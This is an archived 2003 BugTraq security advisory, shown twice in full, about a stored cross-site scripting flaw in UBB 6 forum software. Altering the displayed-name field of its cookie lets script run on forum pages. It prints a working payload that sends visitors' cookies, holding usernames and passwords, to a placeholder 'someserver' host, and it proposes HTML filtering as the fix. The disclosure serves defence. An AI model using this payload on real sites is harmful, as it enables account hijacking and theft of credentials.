BugTraq
Back to list
|
Post reply
Changing UBB cookie allows account hijack
Jul 16 2003 09:14PM
anti_acid hotmail com
Application: UBB 6.(?)
Platform: Any system supporting PERL.
Severity: Malicious users can steal session cookies, allowing
administrative
access to the bulletin board. Also custom html/js insertion in forum page
is possible.
Author:
antiacid
[anti_acid (at) hotmail (dot) com [email concealed]]
Web:
http://www.infopop.com/products/ubb/
Problem:
The ubber cookie can be manually altered allowing to execute javascript
in the forum overview page and (latest posts overview page) and steal
cookies containing username, password and id. This is done by changing
the [displayed name] attribute and post a new topic on the board in the
following cookie:
ubber[sessionid]=[username]&[password]&[displayed name]&[daysshown]&
[userid]
with the following code:
username<script>document.write('<img src%
3D"http://someserver/savereq.php?'%2Bdocument.cookie%2B'" width%3D0
height%3D0>')</script>
When posting a new topic on the forum that topic with your html/js is
rendered in the forum overview page. The html/js in the [displayed name]
gets a 0 width 0 height picture from a malicious server sending along the
ubber cookie contents to the server containing username and password.
fooling around with html/js in the [displayed name] attribute can cause
other things like automatic js redirection to logout page, distorting
forum and inserting custom html content.
Fix.
the [displayed name] attribute should be filtered for any html tags
before rendering to page.
Feedback.
Please send suggestions, updates, and comments to:
mail : anti_acid (at) hotmail (dot) com [email concealed]
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
Application: UBB 6.(?)
Platform: Any system supporting PERL.
Severity: Malicious users can steal session cookies, allowing
administrative
access to the bulletin board. Also custom html/js insertion in forum page
is possible.
Author:
antiacid
[anti_acid (at) hotmail (dot) com [email concealed]]
Web:
http://www.infopop.com/products/ubb/
Problem:
The ubber cookie can be manually altered allowing to execute javascript
in the forum overview page and (latest posts overview page) and steal
cookies containing username, password and id. This is done by changing
the [displayed name] attribute and post a new topic on the board in the
following cookie:
ubber[sessionid]=[username]&[password]&[displayed name]&[daysshown]&
[userid]
with the following code:
username<script>document.write('<img src%
3D"http://someserver/savereq.php?'%2Bdocument.cookie%2B'" width%3D0
height%3D0>')</script>
When posting a new topic on the forum that topic with your html/js is
rendered in the forum overview page. The html/js in the [displayed name]
gets a 0 width 0 height picture from a malicious server sending along the
ubber cookie contents to the server containing username and password.
fooling around with html/js in the [displayed name] attribute can cause
other things like automatic js redirection to logout page, distorting
forum and inserting custom html content.
Fix.
the [displayed name] attribute should be filtered for any html tags
before rendering to page.
Feedback.
Please send suggestions, updates, and comments to:
mail : anti_acid (at) hotmail (dot) com [email concealed]
[ reply ]